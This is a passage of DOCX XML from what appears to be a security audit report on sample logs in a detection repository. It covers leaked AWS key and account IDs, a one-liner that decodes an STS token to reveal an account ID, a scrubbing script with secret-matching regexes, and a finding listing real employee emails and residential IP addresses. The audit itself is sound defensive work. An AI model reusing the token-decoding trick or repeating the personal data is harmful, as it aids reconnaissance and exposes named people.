        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>ASIASBMSCQHH2YXNXJBU 140429656527      # == recipientAccountId left raw in createvirtualmfadevice.yml:105 (self-confirming)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>AKIAIOSFODNN7EXAMPLE 581039954779      # AWS doc example, for comparison</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>$ python3 -I -c "import base64,re;l=open('data_sources/aws_cloudtrail_assumerolewithsaml.yml').read().splitlines()[119];t=re.search(r'\"sessionToken\": \"([^\"]+)',l).group(1);print(re.findall(rb'[0-9]{12}',base64.b64decode(t+'='*(-len(t)%4))))"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>[b'591511147606']</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (1) In AWS, confirm via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aws iam list-access-keys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / the IAM credential report that the ten </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AKIA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IDs are deleted; delete/rotate any that still exist (ASIA IDs expired with their sessions). (2) Replace every key ID with a *synthetically consistent* one that encodes the canonical dummy account so the samples still parse and still exercise the detections. Script to run once and to enforce in CI (also fixes raw account IDs, principal IDs, SSO role names, bucket names, source IPs and the STS token):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>"""scripts/scrub_cloudtrail_samples.py - rewrite real AWS identifiers in data_sources/aws_*.yml example_log lines."""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import base64, binascii, pathlib, re, sys</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>DUMMY_ACCT = 111111111111</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>MASK = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), 'big')</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>def key_id(prefix: str, acct: int, tail: str) -&gt; str:</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field = ((acct &lt;&lt; 7) &amp; MASK).to_bytes(6, 'big')[:5]          # 40-bit account field -&gt; 8 base32 chars</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return prefix + base64.b32encode(field).decode()[:8] + tail.upper().ljust(8, 'A')[:8]</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>RULES = [</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(re.compile(r'\b(AKIA|ASIA)([0-9A-Z]{16})\b'),          lambda m: key_id(m.group(1), DUMMY_ACCT, m.group(2)[8:])),</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(re.compile(r'\b(AIDA|AROA)([0-9A-Z]{17})\b'),          lambda m: m.group(1) + 'EXAMPLE' + m.group(2)[7:]),</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(re.compile(r'(?&lt;![0-9])(?!111111111111)\d{12}(?=["\':/])'), lambda m: str(DUMMY_ACCT)),</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(re.compile(r'AWSReservedSSO_[A-Za-z]+_[0-9a-f]{16}'),  lambda m: 'AWSReservedSSO_AdministratorAccess_0000000000000000'),</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(re.compile(r'"sourceIPAddress": "(?!test\.amazonaws)\d+\.\d+\.\d+\.\d+"'), lambda m: '"sourceIPAddress": "192.0.2.10"'),</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(re.compile(r'"sessionToken": "[A-Za-z0-9+/=]{40,}"'),  lambda m: '"sessionToken": "EXAMPLE_SESSION_TOKEN"'),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>]</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>def main() -&gt; int:</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check = '--check' in sys.argv</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dirty = 0</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for p in pathlib.Path('data_sources').glob('aws_*.yml'):</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original = p.read_text()</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text = original</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for rx, fn in RULES:</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text = rx.sub(fn, text)</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if text != original:</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dirty += 1</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if check:</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print(f'{p}: real AWS identifiers present')</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else:</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p.write_text(text)</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return 1 if (check and dirty) else 0</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>if __name__ == '__main__':</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sys.exit(main())</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--check</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>yaml-validation.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; add a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>gitleaks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> step (SEC-08) with an allow-list for the dummy prefix only. Why it does not regress: detections match </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>eventName</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>userIdentity.type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>errorCode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> etc., not literal key IDs; synthetic IDs keep the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AKIA/ASIA + 16</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shape so regex-based tests (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aws_bedrock_claude_sensitive_data_in_prompts</w:t>
      </w:r>
      <w:r>
        <w:t>) still fire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mappings:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-200, CWE-540 (Inclusion of Sensitive Information in Source Code), CWE-312; OWASP Top 10 2021 A02, A05; OWASP ASVS v4 8.3.4, 14.3.3; MITRE ATT&amp;CK T1552.001, T1580 (Cloud Infrastructure Discovery), T1087.004, T1078.004; NIST SP 800-53r5 SC-28, SA-11, AC-6, RA-5; NIST CSF 2.0 PR.DS-01, ID.RA-01; ISO/IEC 27001:2022 A.8.24, A.8.12, A.5.17; SANS/CERT: Data Protection ("remove sensitive information from source and configuration before release"); gitleaks </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aws-access-token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, semgrep </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>generic.secrets.security.detected-aws-access-key-id-value</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, detect-secrets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AWSKeyDetector</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-200 Exposure of Sensitive Information to an Unauthorized Actor (2024 CWE Top 25 #17); CWE-540 Inclusion of Sensitive Information in Source Code; CWE-312 Cleartext Storage of Sensitive Information. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A02:2021 Cryptographic Failures, A05:2021 Security Misconfiguration. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1552.001 Unsecured Credentials: Credentials In Files, T1580, T1087 Account Discovery, T1078.004 Valid Accounts: Cloud Accounts. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SC-28 Protection of Information at Rest, SA-11 Developer Testing and Evaluation, AC-6 Least Privilege, RA-5 Vulnerability Monitoring and Scanning. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.DS Protect - Data Security, ID.RA Identify - Risk Assessment. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.24 Use of cryptography, A.8.12 Data leakage prevention, A.5.17 Authentication information. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Secrets / Data Protection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SEC-05 — Personal data of employees and residential IP addresses embedded in sample logs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 3.7). Exploitability: Not exploitable (privacy / reconnaissance).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> data_sources/m365_copilot_graph_api.yml:68; aws_cloudtrail_assumerolewithsaml.yml:120; azure_active_directory_update_user.yml:78; osquery_results.yml:74 (40+ files)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Low – CVSS v3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3.7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location / excerpt (all verified with `grep -n`):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>data_sources/m365_copilot_graph_api.yml:68</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"userDisplayName": "Rod  Soto", "userPrincipalName": "rodsoto@rodsoto.onmicrosoft.com", "userId": "bfb8c366-0406-41a5-b3e3-328f4a3b4484"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; same UPN in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aws_cloudtrail_assumerolewithsaml.yml:120</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aws_cloudtrail_updatesamlprovider.yml:109</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>m365_exported_ediscovery_prompts.yml:89</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>o365_add_app_role_assignment_grant_to_user_.yml:97</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>o365_disable_strong_authentication_.yml:94</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (21 occurrences) plus </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pbareiss@rodsoto.onmicrosoft.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>bpatel@rodsoto.onmicrosoft.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>vagrant@rodsoto.onmicrosoft.com</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Corporate e-mails: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>bpatel@splunk.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aws_cloudtrail_deleteknowledgebase.yml:109</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aws_cloudtrail_putbucketreplication.yml:128</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>gowthamarajr@splunk.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aws_cloudtrail_modifydbinstance.yml:161</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>daftpunk@splunk.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aws_cloudtrail_deletesnapshot.yml:146</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aws_cloudtrail_putbucketversioning.yml:119</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pbareiss@splunk.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (5 files), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>tommyr@splunkresearch.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (5 files), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Abigail.Clark@splunkresearch.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (2 files).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Residential/mobile caller IPs: Comcast IPv6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>2601:646:a000:200:b0ee:600c:de8a:c7d5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>azure_active_directory_update_user.yml:78</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>…_enable_account.yml:77</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>2601:646:a000:200:6419:f55c:946d:17d1</w:t>
      </w:r>
